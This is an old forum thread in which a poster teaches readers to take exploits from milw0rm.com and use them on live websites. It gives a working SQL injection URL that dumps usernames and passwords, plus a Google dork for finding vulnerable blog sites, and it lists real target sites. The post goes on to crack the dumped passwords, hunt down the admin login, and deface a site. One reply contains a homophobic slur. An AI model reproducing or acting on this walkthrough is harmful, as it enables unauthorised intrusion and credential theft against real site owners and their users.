![]() |
How to use Milw0rm.com
Hello guys i see people always asking me how to use milw0rm.com so i figured i will show you all.
Today we are going to learn the web applications part of milw0rm.com So lets go to Milw0rm shall we Now go to web applications and you see a whole lot of stuff right were gonna look for sql injection vulnerability. We found this okay right here And it shows you the following Code:
____________________ ___ ___ ________Code:
http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--Code:
Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonthCode:
allinurl:".php?domain= arcyear=2007 arcmonthhttp://www.manilatimes.net.ph/index....007&arcmonth=6 http://www.ravendrumfoundation.org/w...007&arcmonth=9 http://www.shiptalkforum.com/index.p...007&arcmonth=5 And if you remember the dork you was looking for the .php?domain=&arcyear=2007&acrmonth=6 So you got all the sites that google provided so look for any site that has the dork and click it now once you are at that site get the sql injection code and paste it in the url where it says arcmonth=6 paste it after the = remember to delete the 6 tho so it will look like this http://wealthbeing.co.uk/blog.php?do...m%20sys_user-- We hit enter and u see the admin username and password along with other users as well that password is encrypted so user john the ripper or cain and abel to decrypt it and then you will have to find the admin login page i would 1. go through every link right click view source and look for a admin login page if its not there get the cracked version of acuntix and scan that website and it will show you the admin page then you can just login and do whatever you want below is a site that i did on a demonstration and lets go to the following site HACKED BY XXxxImmortalxxXX Now what i did was sql inject the site and it gave me the following admin::imagert26 Which was the usernamd and password and I dunno why it wasnt encrypted anyways it said look for /oneadmin well oneadmin wasnt there So then we go through every link looking at the source code looking for a login page didnt find one my last step was to scan the site with all of its links I did and i got /cms/index.php? which was the login i think they tryed to hide it lol so we then login and do what ever we want hope this tut helps |
Re: How to use Milw0rm.com
Hey I was able to open that URL now and gr8 job. I hope you notified the users before putting that up there.
Also remember Content Copyright of Users everything else Copyright © Go4Expert.com, 2004 - 2008. |
Re: How to use Milw0rm.com
Quote:
|
Re: How to use Milw0rm.com
Why not give to me as well?
|
Re: How to use Milw0rm.com
lol
|
Re: How to use Milw0rm.com
Good share, until i see this pots i dont have idea how can i use the exploits provided in milw0rm....Now let make my trials and get some knowledge on using this stuff....thanks for sharing
|
Re: How to use Milw0rm.com
No problem mate
|
Re: How to use Milw0rm.com
LoL faggits posted this tutorial on there site without giving me any credidation lol
h*tp://www.is-sw.net/vb/showthread.php?t=5617 |
Re: How to use Milw0rm.com
Register there and post a link to your this one. Admin may look at it.
Also I edited your link so that its unclickable |
Re: How to use Milw0rm.com
i did register and u want me to post a link on there site ? to this one?
|
| All times are GMT +5.5. The time now is 11:46. |